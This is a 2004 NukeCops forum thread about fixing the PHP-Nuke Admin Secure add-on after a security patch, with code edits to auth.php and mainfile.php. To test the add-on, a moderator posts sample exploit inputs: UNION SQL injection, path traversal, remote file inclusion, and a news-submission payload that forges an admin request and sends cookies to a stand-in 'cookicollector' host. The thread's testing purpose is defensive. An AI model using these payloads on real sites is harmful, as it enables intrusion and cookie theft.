You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 40 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Admin Secure 1.7 don't work with Sec-Fix Patch 7.3 [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

Admin Secure 1.7 don't work with Sec-Fix Patch 7.3
 
This forum is locked: you cannot post, reply to, or edit topics.  This topic is locked: you cannot edit posts or make replies.printer-friendly view Nuke Cops Forum Index » Admin Secure
View previous topic Log in to check your private messages View next topic
Author Message
JeZMaN
Nuke Cadet
Nuke Cadet


Joined: Dec 09, 2003
Posts: 7
PostPosted: Mon Jun 14, 2004 5:28 am Reply with quoteBack to top
Hi madman,

I'm using PHP Nuke 7.3 on a server with Apache 1.3.31 and PHP 4.3.7. Now I have install Sec-Fix Patch 7.3 from www.nukefixes.com , but now Admin Secure don't work. Maybe for the new $_SERVER['SCRIPT_NAME'] instead of $_SERVER['PHP_SELF'] ... I don't know...

Can you check if Admin Secure works with the new Sec-Fix Patch 7.3?

Thanks madman Very Happy
Find all posts by JeZMaNView user's profileSend private message
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806
PostPosted: Mon Jun 14, 2004 11:21 am Reply with quoteBack to top
If you just replace all those fix files over old ones, then you'll never get Admin Secure to works. Smile

You'll have to modify two nuke files after installing fixes from ChatServ. Here they are:

Open/Edit auth.php, and find these lines:

Code:
$admin = base64_encode("$aid:$pwd:$admlanguage");
setcookie("admin","$admin",time()+2592000);
unset($op);


After, add:

Code:
$_COOKIE['admin'] = $admin;


Find:

Code:
$admintest = 0;

if(isset($admin) && $admin != "") {


Replace with:

Code:
$admintest = 0;
$admin = (isset($_COOKIE['admin']) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $_COOKIE['admin'])) ? $_COOKIE['admin'] : '';

if(isset($admin) && $admin != "") {


Save/close auth.php. Now open mainfile.php, and find these following lines:

Code:
//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections


Before, add:

Code:
function nuke_getRootPath() {
  $ret  = "./";
  if (eregi('\/modules\/[^\/]+\/[^\/]+\/[^\/]+.php$', $_SERVER['PHP_SELF'])) { $ret = "../../../"; }
  else if (eregi('\/modules\/[^\/]+\/[^\/]+.php$', $_SERVER['PHP_SELF'])) { $ret = "../../"; }
  else if (eregi('\/modules\/[^\/]+.php$', $_SERVER['PHP_SELF'])) { $ret = "../"; }
  return $ret;
}
require_once(nuke_getRootPath().'includes/asfunc.php');


Find:

Code:
function is_admin($admin) {


After, add:

Code:
return asec_isAdmin($admin);


Find: (at the end of mainfile.php)

Code:
function stripos_clone($haystack, $needle, $offset=0) {
  return strpos(strtoupper($haystack), strtoupper($needle), $offset);
}


After, add:

Code:
asec_performFilterNotify();
asec_performRealTimeNotify();
asec_performAutoCheckNotify();


Save/close mainfile.php, upload both these modified auth.php and mainfile.php from ChatServ fixes back to your server.

ps:
You don't have to modify admin.php since I can't find patched admin.php in Chatserv's fixes for nuke 7.3.

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
JeZMaN
Nuke Cadet
Nuke Cadet


Joined: Dec 09, 2003
Posts: 7
PostPosted: Mon Jun 14, 2004 12:39 pm Reply with quoteBack to top
madman wrote:
If you just replace all those fix files over old ones, then you'll never get Admin Secure to works. Smile

I had downloaded the fixes from ChatServ and I had made the changes, but don't works.

I tried with the changes of install.txt and with changes of this post.

I'm using admin.php file from PHP Nuke Patched 2.4 http://www.nukeresources.com/downloadview-details-874-Nuke_7.3_Patched.html (I'm using PHP Nuke Patched 2.4 and Sec-Fix Patch)

Have you test if your Admin Secure 1.7 works with Sec-Fix Patch 7.3?

I had tried with a exploit, but i don't know if my exploit "works" with Admin Secure. Can see sendme by PM a exploit for test my Admin Secure?

Thanks.
Find all posts by JeZMaNView user's profileSend private message
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806
PostPosted: Mon Jun 14, 2004 1:43 pm Reply with quoteBack to top
[quote="JeZMaN"]
madman wrote:
I'm using admin.php file from PHP Nuke Patched 2.4 http://www.nukeresources.com/downloadview-details-874-Nuke_7.3_Patched.html (I'm using PHP Nuke Patched 2.4 and Sec-Fix Patch)


Just download it.
I try installing this patch, do changes in nuke files, and everything seems to work.

JeZMaN wrote:
Have you test if your Admin Secure 1.7 works with Sec-Fix Patch 7.3?


I have test it in original 7.3 and using secfix73 patch. Both working fine.

JeZMaN wrote:
I had tried with a exploit, but i don't know if my exploit "works" with Admin Secure. Can see sendme by PM a exploit for test my Admin Secure?


Admin Secure catch any exploits at the last attempt, after other security addons. In 7.3, part of Fortress/UTC code was internally embedded and will catch them first before Admin Secure.

To knowing whether Admin Secure work or not, try to remove/commenting internal Fortress/UTC code, or try to use some exploits not covered by UTC. For example:

Code:
http://foo.bar/index.php?test=1 union%7fselect/**/test%0d%0afrom/**/nuke_hacktest
http://foo.bar/modules.php?name=../../../usr/pwd/password.txt
http://foo.bar/index.php?modfile=http://bar.foo/hacking.php?mode=inject


Or another attempts by submitting a news from Submit_news module and put some text like this:

Code:
<img border=0 src="admin.php?op=addAuthors">
<ilayer src="http://foo.bar/hack/cookicollector.php?id=get&cookie=blabla">

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
JeZMaN
Nuke Cadet
Nuke Cadet


Joined: Dec 09, 2003
Posts: 7
PostPosted: Mon Jun 14, 2004 4:04 pm Reply with quoteBack to top
madman wrote:
Admin Secure catch any exploits at the last attempt, after other security addons. In 7.3, part of Fortress/UTC code was internally embedded and will catch them first before Admin Secure

Yes... that was the "problem", I have try with this exploit:

Code:
<img border=0 src="admin.php?op=addAuthors">
<ilayer src="http://foo.bar/hack/cookicollector.php?id=get&cookie=blabla">

And Admin Secure catch it Smile


Now I have a few questions...

admin.php have I to add this line?:

Code:
if ($admintest && ($op != "logout")) { asec_checkAdminAccess(); }


mainfile.php

Code:
function is_admin($admin) {
  return asec_isAdmin($admin);
}


or

Code:
function is_admin($admin) {
return asec_isAdmin($admin);
    global $prefix, $db;
    if(!is_array($admin)) {
   $admin = addslashes($admin);
   $admin = base64_decode($admin);
   $admin = explode(":", $admin);
        $aid = "$admin[0]";
   $pwd = "$admin[1]";
    } else {
        $aid = "$admin[0]";
   $pwd = "$admin[1]";
    }
    if ($aid != "" AND $pwd != "") {
        $aid = substr("$aid", 0,25);
        $result = $db->sql_query("SELECT pwd FROM ".$prefix."_authors WHERE aid='$aid'");
   $row = $db->sql_fetchrow($result);
   $pass = $row['pwd'];
   if($pass == $pwd && $pass != "") {
       return 1;
   }
    }
    return 0;
}


And auth.php have i replace this:

Code:
$admintest = 0;

if(isset($admin) && $admin != "") {


With:

Code:
$admintest = 0;
$admin = (isset($_COOKIE['admin']) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $_COOKIE['admin'])) ? $_COOKIE['admin'] : '';

if(isset($admin) && $admin != "") {


or with:

Code:
$admintest = 0;
$admin = $_COOKIE['admin'];

if(isset($admin) && $admin != "") {


Sorry for that questions... but install.txt and your code in this post is different...

Thanks madman, and sorry for my bad english, i'm spanish...
Find all posts by JeZMaNView user's profileSend private message
madman
Support Mod
Support Mod


Joined: Feb 15, 2004
Posts: 806
PostPosted: Mon Jun 14, 2004 4:38 pm Reply with quoteBack to top
JeZMaN wrote:
I have try with this exploit:
And Admin Secure catch it Smile


That's the way it work. Smile
Admin Secure only catches any exploits where not handled by any other security addons, act as your last protection layer for your site. Smile

JeZMaN wrote:
Now I have a few questions...
admin.php have I to add this line?:
Code:
if ($admintest && ($op != "logout")) { asec_checkAdminAccess(); }


Yes, to inform admin whenever their account has changed and require approval. It's optional but If absent, admin has no clue when they try to login but cannot gain access to admin menu. Wink

JeZMaN wrote:
mainfile.php
Code:
function is_admin($admin) {
  return asec_isAdmin($admin);
}

or
Code:
function is_admin($admin) {
return asec_isAdmin($admin);
    global $prefix, $db;
    if(!is_array($admin)) {
   $admin = addslashes($admin);
   $admin = base64_decode($admin);
:
:
}


You can use either of both.
Use the first one to reduce filesize. Smile

JeZMaN wrote:
And auth.php have i replace this:
Code:
$admintest = 0;

if(isset($admin) && $admin != "") {


With:

Code:
$admintest = 0;
$admin = (isset($_COOKIE['admin']) && preg_match('/^[a-zA-Z0-9\+\=\/]+$/', $_COOKIE['admin'])) ? $_COOKIE['admin'] : '';

if(isset($admin) && $admin != "") {


or with:

Code:
$admintest = 0;
$admin = $_COOKIE['admin'];

if(isset($admin) && $admin != "") {


You can use either of them.
The first one will increase another security by ensuring that admin variable from cookie is true base64 encoded string.

JeZMaN wrote:
Sorry for that questions... but install.txt and your code in this post is different...


They serve as similar protection.
I post different method here as an alternative.

JeZMaN wrote:
Thanks madman, and sorry for my bad english, i'm spanish...


Don't worry, your statements are very clear to me.
My native language even not English nor Spanish. Very Happy

_________________
I'm Image
Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
Display posts from previous:      
This forum is locked: you cannot post, reply to, or edit topics.  This topic is locked: you cannot edit posts or make replies.printer-friendly view Nuke Cops Forum Index » Admin Secure
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.629 Seconds - 254 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::